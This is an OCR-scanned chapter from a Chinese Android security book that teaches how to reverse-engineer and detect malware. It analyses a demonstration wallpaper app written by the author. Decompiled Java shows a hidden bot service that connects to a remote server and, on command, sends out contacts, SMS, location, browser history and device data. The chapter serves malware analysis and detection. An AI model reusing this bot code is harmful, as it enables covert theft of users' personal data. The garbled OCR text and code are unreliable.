Android 应 用 市 场 没 有 对 发 布 的 应 用 软件 进行 严格 的 安全 审查 (或 设置 软件 发 布 准 
人 门槛 )， 这 就 导致 了 恶意 软件 有 机 会 被 用 户 安装 在 自己 的 设备 上 。 对 于 Android 
应 用 来 说 ， 唯 一 的 安全 管控 机 制 似乎 是 在 软件 安装 的 过 程 中 ， 用 户 被 明确 地 询问 是 
否 同 意 软 件 所 请 求 的 权限 。 一 旦 得 到 用 户 同 意 安装 后 ，Android 应 用 程序 将 得 到 用 


O ” 道 向 工程 定义 源 自 维基 百科 “http: //en. wikipedia. org/wiki/Reverse_engineering”。 一 -一 原 书 注 
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户 完 全 的 信任 。 但 是 ， 用 户 并 不 理解 这 些 安放 的 软件 和 工具 存在 的 所 有 影响 。 考 虑 
到 所 安装 软件 的 复杂 性 以 及 相互 依存 关系 ， 即 使 对 于 经 验 丰富 的 专业 人 员 来 说 ;要 
想 指出 某 个 软件 包 是 否 值得 信赖 也 是 相当 复杂 的 事情 。 在 这 种 情况 下 ， 逆 向 工程 就 
变 得 至 天 重要 了 。 

逆向 工程 包括 一 组 技术 ， 可 以 识别 软件 是 如 何 工作 的 。 一 般 情况 下 ， 对 于 送 向 
工程 来 说 达成 这 种 目的 无 需 访 问 软件 的 产 码 。 

逆向 工程 可 以 有 效 地 对 软件 的 安全 性 进行 分 析 ， 原 因 如 下 : | 

1) 识别 恶意 软件 /代码 : 安全 公司 可 以 使 用 逆 回 工程 技术 识别 一 段 特 定 的 恶 
意 程序 〈 如 病毒 、 蠕 虫 程序 等 ) 如 何 运 作 ， 从 而 针对 其 开发 应 对 方案 。 逆 问 工程 
也 可 以 帮助 开发 试探 程序 ， 在 用 户 被 影响 之 前 ,识别 出 可 能 出 现 的 恶意 软件 行为 。 

2) 发 现 缺陷 /安全 问题 : 道 同 工程 是 安全 专业 人 员 最 后 使 用 的 一 项 技术 ,用 
来 验证 软件 中 是 否 存在 能 够 被 人 利用 的 缺陷 或 问题 。 例 如 ，， 可 以 使 用 逆向 工程 确定 
应 用 程序 是 否 为 黑客 提供 了 大 量 的 有 用 信息 或 在 堆 / 栈 中 存在 可 预测 的 数据 。 

3) 识别 软件 中 的 计划 外 功能 : 逆向 工程 还 可 以 供 特 定 软件 的 开发 者 确定 软件 
中 是 否 存在 软件 设计 计划 之 外 的 功能 。 如 果 存 在 ， 开 发 者 就 可 以 采取 恰当 的 方法 组 
解 这 些 问 题 。 | 

逆向 工程 技术 已 经 存在 了 很 长 时 间 。 比 如 ， 竞 争 对 手 试图 对 流行 的 产品 进行 逆 
向 工程 ， 各 国政 府 试图 对 敌对 国 的 国防 技术 进行 逆向 工程 ， 数 学 家 试图 对 工程 加 密 
算法 进行 逆向 工程 等 。 然 而 ,需要 注意 的 是 ， 本 章 对 Android 应 用 程序 进行 的 逆 同 
工程 并 不 是 出 于 任何 其 他 非法 目的 。 

对 应 用 软件 进行 逆向 工程 是 非法 的 。 因 为 这 侵犯 了 开发 者 及 相关 公司 的 版 权 ， 
应 用 软件 受到 著作 权 法 和 数字 版 权 的 保护 ， 任 何以 非法 目的 从 事 逆向 工程 的 做 法 将 
受到 相关 法 律 的 制裁 。 本 章 演 示 逆 向 工程 技术 的 目的 只 有 一 个 ， 就 是 用 来 破解 和 分 
析 亚 意 软件 ， 指 导读 者 如 何 对 可 能 的 恶意 软件 进行 审查 ， 从 而 将 其 从 合法 软件 /下 
载 软件 中 区 分 出 来 。 | 

Android 提供 了 一 些 有 用 的 工具 辅助 进行 逆向 工程 。 前 面 章节 已 经 介绍 了 一 些 
工具 ， 本 章 将 介绍 另外 一 部 分 工具 。 本 章 将 通过 一 个 应 用 程序 引导 用 户 使 用 逆 同 工 
程 技术 分 析 应 用 程序 的 恶意 行为 ， 该 应 用 程序 是 本 书 作 者 编写 的 ， 仅 用 于 进行 分 析 
演示 之 目的 。 


6.2. 恶意 软件 


恶意 软件 (也 可 称 为 恶意 的 程序 或 应 用 ) 是 一 种 软件 程序 代码 ， 旨 在 干扰 正常 
的 使 用 ， 收 集 系统 /用 户 的 敏感 和 /或 未 经 授权 的 信息 。 恶 意 软 件 包括 病毒 、 蠕 虫 、 林 
马 、 间 谍 软 件 、 按 键 记录 程序 、 广 告 软件 、rootkit 后 门 ， 以 及 其 他 恶意 程序 代码 。 
一 般 ， 具 有 下 述 行为 的 软件 被 归 为 恶意 软件 : 
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1) 干扰 正常 使 用 : 这 类 软件 一 般 设 计 用 来 为 阻止 用 户 正 常 使 用 系统 。 其 行为 
包括 占用 所 有 的 系统 资源 (如 磁盘 空间 、 内 存 、CPU 计算 周期 ) ， 以 及 在 网 络 上 放 
置 大 量 的 数据 流量 消耗 网 络 人 带宽 等 。 

2) 未 经 授权 收集 手机 敏感 信息 : 这 类 恶意 代码 试图 窃取 有 价值 的 ' (敏感 的 ) 
信息 ， 例 如 按键 记录 程序 ， 它 会 跟踪 用 户 按键 ， 并 将 按键 记录 信息 提供 给 攻击 者 . 
当 用 户 输入 敏感 的 信息 ， 例 如 SSN、 信 用 卡号 码 ， 以 及 密码 等 ， 这 些 信 息 都 可 能 被 
记录 并 发 送 给 攻击 者 。 

3) 在 系统 上 执行 未 经 用 户 授权 的 操作 : 这 类 软件 会 在 系统 /其 他 应 用 程序 上 
执行 其 主张 用 途 之 外 的 功能 。 例 如 ， 壁 纸 应 用 程序 试图 从 银行 应 用 程序 上 读 取 敏感 
资料 或 修改 文件 ， 从 而 影响 其 他 的 应 用 程序 。 


6.3 识别 Android 恶 恶意 软件 


本 节 主 要 讨 i 仓 如 何 识别 那些 上 属于 Android 设备 恶意 软件 范畴 的 行为 。 在 前 面 
章节 中 已 经 了 解 到 ， 这 些 行为 可 和 有 出 现在 操作 系统 层面 (如 Android? Linux 内 核 )， 
还 可 能 出 现在 应 用 程序 层面 。 问 题 是 如 何 去 检 测 Android 系统 上 的 可 疑 应 用 并 对 它 
们 进行 分 析 呢 ? 本 节 将 为 安全 专业 人 员 提 供 一 些 用 于 识别 应 用 程序 可 疑 行为 和 对 应 
用 程序 进行 评估 的 方法 。 以 本 书 作者 编写 的 一 球 恶 意 软件 为 例 ， 通 过 对 其 进行 研 
究 ， 列 举 方法 如 下 : 

1. 源码 /功能 

这 是 识别 潜在 的 可 疑 应 用 程序 的 第 一 步 。 如 果 Android 应 用 程序 不 是 从 正规 软 
件 下 载 源 上 获得 的 (例如 ， 从 某 一 网 站 而 不 是 Android 应 用 市 场 上 下 载 的 ) ， 就 需 
要 仔细 地 检查 该 应 用 程序 的 功能 。 在 很 多 情况 下 ， 如 果 用 户 已 经 把 应 用 程序 安装 到 
移动 设备 上 ， 就 不 能 进行 这 种 检查 了 。 但 是 ,不 论 在 什么 情况 下 ， 都 必须 要 注意 应 
用 软件 主张 的 功能 ， 这 一 点 是 很 重要 的 ， 在 步骤 2 ~4 中 将 对 这 一 点 进行 分 析 。 

2. 权限 

现在 ， 假 设 已 经 分 析 并 了 解 了 应 用 程序 可 能 具有 的 行为 ， 接 下 来 需要 检查 应 用 
程序 请 求 的 权限 。 应 用 程序 执行 的 操作 应 当 与 其 请 求 的 权限 相 匹配 。 假 如 应 用 程序 
请 求 的 权限 超出 了 其 功能 所 需 的 权限 ， 就 需要 对 其 进行 进一步 的 评估 。 

3. 数据 

根据 应 用 程序 的 请 求 权 限 ， 可 以 得 出 它 能 够 访问 的 各 种 权限 范围 内 的 数据 类 
别 。 根 据 这 一 原则 ， 查 看 应 用 程序 对 数据 的 访问 操作 是 否 同 应 用 程序 在 设计 上 的 预 
期 功能 相 匹 配 ?, 应 用 程序 是 否 访 问 了 其 主张 的 功能 并 不 需要 的 数据 ， 应 用 程序 中 是 
否 包含 访问 越权 数据 的 操作 ? 

4. 联网 | 

本 方法 的 最 后 一 个 步骤 是 分 析 应 用 程序 的 源码 〈 稍 后 介绍 )。 检查 人 员 需 要 确 
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定 应 用 程序 是 否 开 局 了 套 接 字 (以 及 和 哪些 服务 融 连 接 )， 乔 清 什么 类 型 的 数据 被 
传输 〈 数 据 传输 是 否 安全 ) ， 以 及 看 它 是 否 使 用 了 广告 文 持 库 ， 等 等 。 


6.4 Android Jv FH Tz Fr i2 [5] L 1€ 77 7A 


在 上 一 节 中 ， 主 要 介绍 了 可 疑 Android 应 用 程序 的 评估 方法 ， 本 节 将 使 用 这 些 
方法 ， 对 一 个 壁纸 应 用 程序 展开 分 析 。 同 样 ; 该 应 用 程序 也 是 本 书 作 者 编写 的 。 

步骤 1: 审查 应 用 程序 的 源码 和 功能 

以 本 书 作者 编写 的 壁纸 应 用 程序 Cute Puppies 为 例 进行 测试 ， 该 应 用 程序 可 从 
作者 网 站 (www. androidinsecurity. com) 或 Android 应 用 市 场 上 上 下载。 如 果 应 用 程序 
只 能 从 非 标准 源 〈 例 如 ， 从 网 站 上 ) 上 下 载 ， 训 无 疑问 必须 对 这 样 的 应 用 程序 做 
进一步 的 审查 。 该 应 用 程序 在 模拟 器 上 安装 完 后 ， 看 起 来 和 其 他 流行 的 壁纸 应 用 程 
序 无 异 ， 程 序 安 装 过 程 和 该 应 用 程序 界面 如 图 6. 1 和 图 6.2 Brzn e 


TES js platform-tools — bash — 80x24 — 
anmmisnrc-mac:platform-tools Anmol$ ls 
NOTICE. txt LO renderscript 
capt sounce.properties 
ado 
gidi 
anmmisra-mac:platform-tools Anmols adb instali -/Inbox/CutePuppiesWallpaper.apk 
«bash: adb: commond not found 
anmmisra-mac:platform-tools Anmmol$ ./adb install -/Inbox/CutePuppiesWallpaper.op 
K 


1573 KB/s (628797 bytes in 0.3905) 

pkg: /data/local/tmp/CutePuppiesWallpaper.apk 
Success 
anmmisra-mac:plotform-tools Anmol$ 


ome Contacts 





图 6.2 JW BIET rr RE 
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步骤 2: 审查 应 用 程序 使 用 的 权限 

在 第 4 章 已 经 介绍 了 Android 的 权限 ， 并 且 在 第 5 章 介 绍 了 如 何 访问 Mani- 
fest. xml 文件 (该 文件 列 出 了 应 用 程序 所 需 权 限 列 表 ) 。 在 Cute Puppies 壁纸 应 用 程序 
上 使 用 apktool 工具 获取 该 应 用 请 求 的 权限 列表 ， 操 作 过 程 如 图 6.3 和 图 6.4 Brzn. 


Anmol = Tem Me too Re meii ec -[Andretd/ endroic -sd tools-— 55h e xij 
hd , ] Md ee rd — - eer Ter 


/Androtd/android-sdk/tools$ apktool decode CurtePupolesWollpaper.apk ./puppies/ 


"a 
dk android:minSdkVersions 8" 7> 
on android:names»"andnoiíd.permission.RECETVE BOOT COMPLETED 
android- permission. INTERNET" 
id nanea nndroid. permission. ACCESS. COARSE LOCATII 
indroigd:nane=" ond old permission. ACCESS FINE. LOCATION 
"andr issSton. READ PHONE STATE 
LO SET NALLPAPER" /> 
Orn. READ CONTACTS” 
IN WRITE CONTACTS 
16524 AUI: SMS j 
(r'€s1on READ OWNER DATA 
'& A 





图 6.4  AndroidManifest 文件 列 出 的 壁纸 应 用 程序 所 需 权 限 


从 图 6. 4 中 可 见 ， 该 应 用 程序 似乎 申请 了 过 多 的 权限 。 表 6. 1 对 这 些 请 求 的 权 
限 进行 了 总 结 ， 包 括 这 些 权限 在 Android 设备 上 的 用 途 ， 以 及 是 否 是 壁纸 应 用 程序 
所 必需 的 。 很 显然 ， 该 应 用 程序 请 求 的 权限 远 多 于 其 所 需 的 权限 。 


表 6.1 AndroidManifest 文件 中 列 出 的 壁纸 应 用 程序 所 需 权限 


n M Br 


允许 应 用 程序 接收 ACTION. BOOT. _ 


COMPLETED 事件 ， 该 事件 于 系统 引 可 有 可 无 应 用 程序 的 一 些 功 
能 可 能 需要 该 权限 设置 壁纸 
导 完毕 后 广播 


可 有 可 无 。 应 用 程序 可 能 需要 该 
权限 连接 外 部 服务 器 获取 新 的 壁纸 


人 允许 应 用 程序 获取 粗略 的 位 置信 息 ， 
如 移动 蜂窝 通信 基站 卫 码 ，Wi- 下 位 
置信 息 








RECEIVE BOOT COMPLETED 










ACCESS. COARSE. LOCATION 个 需要。 应 用 程序 无 需 位 置 


允许 应 用 程序 获取 精准 的 位 置信 息 ， 
如 GPS 






ACCESS FINE. LOCATION 
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(2E) 


Eae 以 只 读 的 方式 获取 手机 状态 | 不 需要 。 应 用 程序 无 需 读 取 电 






READ PHONE STATE 





话 状态 信息 
SET WALLPAPER 人 允许 应 用 程序 设置 壁纸 » ARRA N HERO 
功能 
m A £ 允许 应 用 程序 修改 (但 不 可 读 取 )| 不 需要 。 应 用 程序 无 需 访问 联 
WRITE. CONTACTS 
用 户 联 系 人 资料 系 人 资料 
不 需要 。 应 用 程序 无 需 访 问 联 
READ CONTACTS 允许 应 用 程序 读 取 用 户 联系 人 资料 i 
系 人 资料 
不 需要 。 应 用 程序 无 需 访 问 
RECEIVE. SMS 允许 应 用 程序 读 取 SMS 短信 息 F is 


SMS 短信 息 

可 有 可 无 。 看 起 来 可 疑 。 不 过 应 
用 程序 有 时 确实 需要 读 取 用 户 资 料 
允许 应 用 程序 以 只 读 的 方式 读 取 用 | 不 需要 。 应 用 程序 无 需 访 问 历 


READ OWNER. DATA 自 定 义 权限 





READ, HISTORY BOOKMARKS 


| 户 浏览 器 浏览 历史 和 书签 史 数 据 
”| 色 许 应 用 程序 修改 (但 不 可 读 取 )| 不 需要 。 该 应 用 程序 不 需要 访 
WRITE HISTORY BOOKMARKS |. l 
用 户 浏览 器 浏览 历史 和 书签 问 历史 数据 


步骤 3: 审查 应 用 程序 使 用 的 进程 间 通 信 (IPC) 机 制 

接 下 来 分 析 应 用 程序 中 使 用 的 IPC 机 制 ， 如 图 6.5 所 示 。 从 AndroidManifest X: 
件 中 ， 可 以 看 到 Intent 和 Intent 过 滤器 ， 现 在 来 分 析 一 下 和 这 些 Intent 相关 联 的 An- 
droid 组 件 ， 如 Service, Receiver, Activity 等 。 表 6. 2 fi 述 了 该 应 用 程序 中 定义 的 
[PC 机 制 及 对 它们 的 分 析 。 





图 6.5 Cute Puppies 壁纸 应 用 程序 中 使 用 的 IPC 机 制 
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表 6.2 Cute Puppies 壁纸 应 用 程序 使 用 的 IPC 机 制 


IPC 组 件 
RECEIVER 


com. adam. CutePuppiesWallpaper. 


BotBroadcastHandler 
RECEIVER 


com, adam. CutePuppiesWallpaper. 


BotSMSHandler 
SERVICE 


com. adam. CutePuppiesWallpaper. 


BotService 
ACTIVITY 
CutePuppiesWallpaper 





E: 


android. intent. action. 接收 手机 启动 引导 完毕 时 ， 系 
BOOT COMPLETED 统 发 出 的 广播 事件 。 非 必须 


android. provider. 接收 系统 关于 收 到 SMS 信息 
Telephony. SMS_RECEIVED 事件 的 广播 。 非 必须 


com. adam. CutePuppiesWallpaper. 
后 台 服 务 。 可 能 会 需要 


BotService 


android. intent. action. MAIN 应 用 程序 启动 后 调用 的 主 Activity 


步骤 4: 分 析 源 码 审 查 开放 的 端口 、 共 享 /传输 的 数据 ， 以 及 socket 连接 等 

反 编 译 apk 获取 Java 源码 

最 后 ， 将 应 用 程序 反 编 译 成 可 读 的 Java 代码 。 然 后 审查 该 代码 以 便 更 深入 地 
了 解 应 用 程序 的 行为 。Android 包 文 件 (apk) 是 一 个 压缩 文件 ， 包 含 一 个 clas- 
ses. dex 的 文件 ， 以 及 一 些 其 他 的 文件 。apk 文件 很 容易 解压 ， 从 中 提取 出 clas- 
ses. dex 文件 。DEX 是 运行 在 Dalvik 虚拟 机 上 的 Java 字 节 码 文 件 ， 这 种 文件 经 过 优 
化 非常 适合 在 小 型 的 设备 上 运行 。dex2jar 工具 只 用 于 将 classes. dex 文件 转换 成 jar 
文件 ， 如 图 6.6 所 示 。 产 生 的 jar 文件 可 以 使 用 Java 反 编 译 右 (例如 ， 工具 ) 


来 查看 ， 如 图 6.7 所 示 。 





图 6.6 使 用 dex2jar 工具 将 classes. dex 文件 转换 成 jar 格式 


分 析 源 码 中 的 开放 端口 、 共 享 /传输 的 数据 ， 以 及 打开 的 socket 
接 下 来 ， 使 用 Java 反 编 译 器 分 析 这 个 j 文件 。 如 图 6.7 所 示 ， 在 JD- GUI T. 
具 中 打开 classes. jar 文件 。 可 见 ， 组 成 该 应 用 软件 Java 架构 (jar 文件) 的 类 文件 


如 下 : 


1) BotBroadcastHander。 


2) BotClient, 


3) BotLocationHandler, 


©  dex2jar 工具 可 以 从 http: //code. google. com/p/dex2jar/downloads/list 网 站 上 获得 。 一 一 原 书 注 
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package com adam.CutePuppiesWallpaper; 
&límport android.app.Activity; 







public class CutePuppiesWallpaper extends Activity 







private Integer[] sThutbIds; 
public CutePuppiesWallpaperí) 
t 






Integer!) arrayOfInteger = new integerl22); 
arrayOfInteger{9]. = Integer, value0f( 2130837507) ; 
arrayOfIntegeri)1) = Integer. val veOf( 2130837585) ; 
arrayO0fInteger|2] = Integer. vaiue0f(2136837504) ; 
arrayOtInteger|3] = Integer. value0f(2130837518) ; 
arrayOfInteger[4] = Integer .vaiueQf(2130837511); 
arrayOfInteger[5] = Integer .value0f(2138837512) ; 
arrayOf Integer[6] = Integer. valueQf(2135837505) ; 
arrayOfInteger!7] = Integer. valueOf( 2130837586) ; 
arrayO0fInteger|8] = Integer .vaiue0f(2130837587) ; 
arrayOfiateger|3] = Integer.vaiue0f(2130837508) ; 
arrayOfIntegerl18] = Integer.value07(2139837599) ; 









errayOfinteger[11] = Integer, value0/(2130837518) : 
arrayOfinteger[17] = Integer.value0f( 2130837511): 
arrayüfioteger[13] = Integer.valoeQf(2138837512) ; 
arrayOfInteger|14] = Integer. valueQf(2138837505) ; 
arrayOtInteger[15] = Integer. value0f(2139837506) ; 
arrayOfinteger[16] = Integer. value0f( 2139837587) ; 
arrayOfInteger[17] » Integer. value0f( 2139837598) ; 
arrayOfInteger[18] = Integer .value0f( 2138837589) ; 
array0fInteger[19] = Integer.value0f( 2130637510) : 
arrayOfinteger[28] = Integer.value0f( 21308375111); 
arrayOfInteger[21] = Integer. value0f( 2138837512) ; 
this.rThusbIds = arrayOfInteger; 










} 
| public void onCreatelBundle param&undle! 
1 


super .onCreate(paramBundle); 
setContentView(2130903041); 
Object localObject = new Intent(!; 

(A Intent]localobject). setAction(* «om. adam. CutePuppieswallpaper BotService*l; 
startServicel (Intent)localObjecti; 

localobject = WallpaperManager.getInstance(thás); 






6.7 使 用 Java 反 编 译 器 查看 jar 文件 内 的 Java 代码 


4) BotSMSHandler 。 

5) BotService, 

6) BotWorker, 

7) CutePuppiesWallpaper, 

8) R, 

在 上 述 几 个 类 文件 中 ， 该 应 用 程序 的 Main Activity 类 似乎 定义 在 CutePup- 
piesWallpaper 文件 内 ， 接 下 来 使 用 JD- GUI 工具 来 看 一 下 该 文件 的 内 容 。 

CutePuppiesWallpaper. class 类 文件 分 析 : 

从 图 6.8 可 见 ， 该 类 文件 内 部 定义 了 一 个 整 型 数组 ， 用 来 指向 壁纸 资源 (这 
些 壁 纸 资源 定义 在 资源 文件 R 类 中 )。 然 后 ,该 类 在 后 台 启 动 了 BotService Je f HR 
务 。 接 下 来 ， 再 来 看 一 下 BotService. class 文件 。 

BotService. class 类 文件 分 析 : 

从 图 6. 9 中 可 见 ，BotService 服务 启动 后 ， 首 先 初始 化 了 一 个 BotClient $ 9i 
对 象 。BotClient 类 的 构造 函数 的 参数 中 包含 一 个 外 部 URL (HI k2. homeunix. com) 
和 一 个 socket 端口 ，1500。 然后， 被 初始 化 BotClient 客户 端 对 象 调用 BotClient 类 
内 部 的 Run( ) 函数 ,将 自己 启动 。 下 面 再 来 看 一 下 BotClient. class XIF, DA E 
所 定义 的 功能 。 | 
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BotLocatjonHandler class | 








[Rdass | CutePupplasWallpaper class Q BotSMSHandier'dass | 


arrayOfInteger[4] = Integer. volueON 2138437511); 
arrayOfInteger[5] = Integer. val veOf(2130827512); 
arrayOfinteger[6] = Integer. valueOf(21384337585)); 
arrayOfInteger[7] = Integer. vai ve0f(2130837506) ; 

arrayüfinteger[3] = Integer. vai ucOf( 2138137587), 
arrayOfinteger[9] = Integer, val ueOf( 2130337508); 
arcayOflnteger(180] = Integer. volucOf( 21308375993); 
arrgyOflnteger[11] = Integer , vol ueOF( 2130837519); 
orrayOfInteger[17] = Integer. volue2/( 2130837511); 
arrayO0fInteger[13] = Integer .vo1ue07( 2130837512); 
arrayüfloteger[14] = Integer. volue0f( 2130837585); 
arrayOfInteger[15] « Integer . volue 21308375906), 

| arrayOfinteger[16] = Integer. volue2f( 21388375075; 

| orrcayOfinteger[17] =- Integer. rolueON 2130837508) ; 

| 

| 

| 









arrayOfInteger[18] = Integer. vulueOf( 2136817505) ; 
arrayOflnteger[19] = Integer. valued 2138837510); 
arrayOfinteger[20] = Integer. value0f( 2130837511); 
errayOfinteger[21] ~ Integer. volueOf( 2138337512); 
this.sThuszblds =- orrcyOüfInteger; 

】 


public void onCreaote(Bundle pocamBundle) 
{ 
super onCreate(parasBundle); 
setContent V1 ex( 22 39903941) 
Object localO0bject < nes Intent(): 
CCIntent)locelOb ject) .setAction( " com. odan. CutePuppiesftollpaper BotSecvice"); 
startSecvi ce( (Intent )1ocolObject); 
locol0bject = WollpoperMenager. get Instance thí s); 
GridVien localGridViem = (CGridviem)findVienty14(2131034112); 
localGre: dvi en. sethdaptee( nem. LoogeAdacter( thi15)): 
local6ridvt ew. setünTtemClickListener(nem AdSoptecVtew OnItemClickLictener((Wal Lpaperanoger )1ocalObject) 
|! 
public void onIteeClick(Adapteariee paromAdopterView, Vien poroeVien, int poronint, long paromLong) 
t 


( 
this. vol Sr setResource( CutePucoiesfio] logoer . this. sThustIds[paromInt] 1atValue(); 
return; 


cetch (lOExceotion locollIOEaception) 

1 

while (true) 
locolIO£xception,print$tockTrace(); 


| 
| 
] 
| 
ifr 


图 6.8  CutePuppiesWallpaper 类 


-= 一 ~ 全 一 一 一 一 -一 -ee 


| classes dexzJarJar o _ 








* 8) com. adam CutePupplesWallpaper | BotServicaddass o i 
a u) Boro pockage con odom.CutePugptesWallpaper; 
b [f| BotClient 
Ld 
P iJ BotS$MSHandler 
b i Bot$MSLIstner public class BotService extends Service 





F D ea: i public static Final String LOG TAG = "WCS BOT BatService”; 


M [I] CutePuppiesWallpaper 


» [na public [Binder onBind( Intent paramIntent) 
TH 


" J 
Jj BotLocatíonHandler | import ondroid. app. Service; 
| 
Li d 


Aq 
| super .onCreate(); 
} 


| public void onDestroy() 
|! 
super. onDestroy(; 
) 


public void on$tart(Intent paromIntent, int paromiInt) 

{ 

super.onStart(paromIntent, paromInt); 

Context localContext = getBaseContext(): 

Log. vC" MCS, BOT BotService', "Service 5torted"); 

| nem BotClient(^k2 BB com", 1500, getContentResolver(Q), locolContext) Runt): 
b 


return null 
| ) > 
| e 
| public void onCreateO 
J 


6.9  BotService. class 


BotClient. class 类 文件 分 析 : 

BotClient. Run( ) 函数 调用 时 ， 在 该 函数 内 部 依次 调用 了 ConnectToServer( ) P 
数 和 MasterCommandProcessor( ) Pit, ConneetToServer( ) PK TE this. port 端口 上 
建立 了 一 个 指向 this. hostUri 的 socket 连接 ， 然后 创建 输入 输出 流 ， 从 该 socket 连 
接 通道 中 读 写 数据 ， 如 图 6. 10 所 示 。 接 下 来 调用 MasterCommandProcessor( ) 构造 
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函数 初始 化 并 启动 MasterCommandProcessor 线程 。 在 MasterCommandProcessor 线程 
类 的 Run( ) PA XP, KK B HR AS 38 HJ dg 4 BEUM Sl localObjeetl 变量 中 ， 如 
图 6.11 所 示 。 然 后 将 变量 localObjectl 的 值 同 整 数值 101 ~ 106 进行 比 对 检查 。 根 
据 该 值 ， 调 用 BotWorker 类 中 对 应 的 函数 ， 返 回 请 求 的 远程 服务 器 信息 。 例 如 ， 当 
变量 localObjeetl 的 值 为 101 时 ， 返 回 bwr, 


an R FM — PS 
BotClient.class £5 
public BotClient(String paramString, int paromInt, ContentResolver paromContentResolver, Context paramContext) 
this.port « Integer. valueOf(paramInt) ; 
this.hostUri = paramString; 
this.cr = paramContentResolver; 
this.context = paramContext; 
this.bwr « nem BotWorker(this cr, this.context); 
} 


public void MEE 
{ 
try 
{ 
this. socket « nem Socket(InetAddress, getByName(this .hostUri).getHostName(), this.port.intValueO); 
this, ıStream » new ObjectInputStream( this. socket .getInputStream()); 
this ooSteeoam = nem ObjectOutputStream(this. socket getOutputStream()); 
Log.v("MCS BOT BotClient", "Connected to Master Chief Sundaysn"); 
return; 
) 
cotch (IOException locallOException) 
mhile (true) 
local IOException.printStackTrace(); 
) 
) 
public void Run() 
{ 
Canti To Server C 
new Thread(new MasterComnagndProcessor()).start(; 
| ) 
public class MosterCommandProcessor extends Threod 
t 
public MasterComandProcessor() 
{ 
} 
public void SendDataToMoster(Object paramðbject) 


try 

{ 
BotClient this.ooStream .writeObject(paramübject); 
return; 


图 6.10  BotClient. class- ConnectToServer( ) PRA 


如 图 6. 12 所 示 ， 调 用 GetContactInfo 函数 获取 联系 人 信息 并 将 其 发 送 到 远程 服 
务 器 。SendDataToMaster( ) 函数 用 于 将 数据 写 人 到 Socket 输出 流 ， 将 数据 发 送 到 远 
FERRI Ai o 

BotWorker. class 类 文件 分 析 : 

如 图 6. 12 和 图 6. 13 所 示 ， 根据 变量 localObjectl 的 值 ，BotClient 类 调用 Bot- 
Worker 类 中 的 各 种 相应 函数 。 例 如 ， 当 localObjectl 为 101 时 ，BotClient 调用 Bot- 
Worker. GetContactInfo( ) 函数 。 和 在 BotWorker 类 中 征 义 的 该 函数 的 实 际 功能 是 从 设 
备 上 获取 联系 人 信息 。 同 样 ， 该 类 还 定义 了 一 些 其 他 的 函数 ， 用 来 获取 浏览 器 历史 
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 Sottlientclass © 
| | 
public class MasterCommandProcessor extends Thread 


|n: t 
| i public MasterCommandProcessor() 
bad 
| 





b l 
FS 
public void SemdDokaTOMUStEr (Object paramObject) 


{ 
try 
t 
BotClient.this.ooS5tream writeObject(paramobject); 
return; 
) 
catch (Exception localExcepttion) 
| { 
| | while (true) 
| Log. v("MCS BOT Bot(lient^, "Server Closed connection"); 
| } 
} 
public void run() 
{ 
| int i » 9; 
| if (!BotClrent. this,bRunning) 
I^! return; 
while (true) 
i 
try 
i 
Object localObjecti = (Str1ng)BotClient. this, 15tream, ceadObj;ect(); 
if ((CString)localO0bjectl).equals( ^5) 
break ; 
1 a Integer. parseInt((String)local0bject1); 
Log. wC"MCS. BOT BotClient^, 'commond recieved:;" % 1); 
localObject]1 = new Hashtable()5; 
switch (1) 
( 
default: 






SendüatoToMaster ( LocolObject1); 
case 101: 
cose 102: 
case 105: 
cose 10H- 


[&| 6. 11 BotClient. class- MasterCommandProcessor( ) pA% 


信息 、 设 备 信 息 、 安 装 的 软件 信息 ， 以 及 SMS 信息 ， 如 图 6. 14 所 示 。 表 6.3 列举 
了 所 有 在 BotWorker 类 内 部 定义 的 函数 。 
表 6.3 BotWorker 类 定义 的 函数 
PR Nm PR 说 明 


BotWorker ( ContentResolver paramContentResolver, Context 


BotWorker Æ Bg fA3é PR. ( UL ER] 6. 15) 


paramContext ) 
GetBrowserHistory ( ) | 提供 浏览 器 历史 信息 〈 见 图 6. 16) 
GetContactInfo( ) | 提供 联系 人 信息 ( 见 图 6. 17) 
GetCurrentLocation( ) 提供 位 置信 息 ( 见 图 6. 18) 
GetDeviceID( ) 提供 设备 信息 ( 见 图 6.19) 
GetPackagesInstalled( ) 提供 设备 上 安装 的 软件 列表 信息 ( 见 图 6. 20) 
GetReceivedSMS( ) 获取 设备 上 收 到 SMS 信息 ( 见 图 6.21) 


ReadContacts( ) 读 取 联系 人 资料 (ILES 6. 22) 
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BotClient.this.bRunming = false; 
Log.v("MCS 8DT BotClient^, THES server closed connection"); 
localIOE xcepttion.printStockTroce(): 
continue , 
) 
catch (ClassMotFoundException localClassNotFoundException) 
{ 
localClossNotFoundExcepti0on. printStackTrace(); 
) 
break; 
localClassNotFoundException.put(Integer. valueOf( 101), BotClient. this, bw EECORESEEERESO) 
Log.«("MCS BOT BotClient", "WCS ordered contacts"); 
continue, 
localClassNotFoundException  put( Integer. valueOf( 102), BotClient.this. bwr.GetBrowserHistory (OO); 
Log.v("MCS BOT BotClseot", "HES Browser History"); 1; 
continue; 
localClassNotfFoundException. put( Integer. valueOf( 105), BotClient. this. bur. GetPockagesInstalledO); 
Log.w("MCS BOT BotClieot^, "HCS Get Pockoges"); 
continue; 
Object localÓbject2 = BotClient this. bwr.GetCurrentLocation(); 
local ClassNotFoundException. put( Integer. valueOfC 104), locolObject2), 
Log. vC "NCS BOT BotClient^, "MS Get Locotions"); 
continue ; 
localÓbject?2 «= BotClient this. bwr .GetReceivedSMSQ; 
locolClassMotFoundExceptt1on put( Integer. valueOf( 193), locolObject2); 
Log.v("MCS BOT BotClient^, "MES Get SMS Messages"); 
Continue; 
localóbject2 = gotClient.this. bwer .GetDeviceID(); 
localClossNotFoundException. put( Integer. value0f( 186), local0bject2); 
) 
) 
) 


$totic abstract interface McsDoataTypes 

{ 
public static final int MCS BROWSER HISTORY = 102; 
public stotic final int C$ CONTACTS INFO = 181; 
public static finol int MCS DEVICE, INFO = 106; 
public stotic Finol int MCS LOCATION = 104, 
public stotic finol int MCS PACKAGES = 105; 
public stotic final int MCS SMS = 181; 
public stotic Final int MCS STOP = 772; 


图 6.12  BotClient. class- MasterCommandProcessor( ) 


public UDNNN string. Arraylist«String»» GettontoctInfocC) 


( 
UN LocciHoshtable - ne» PEN: 
Cursor locolCursor = this.cr. queryCContoctsContract Contacts. CONTENT. URI, null, null, null, mull}; 
if ClocolCursor.getCount() > 9) 
mhile (localCursor maveToMext ()) 
1 
ArrayList locolarrayList = nem ArrayListc); 
String str? = locolCursor getString(localCursor.ge*ColumnIndex(" 14d^)); 
String str3 = locolCursor.getString(localCursor .getColumnIndex( display nome"); 
String stri = '"; 
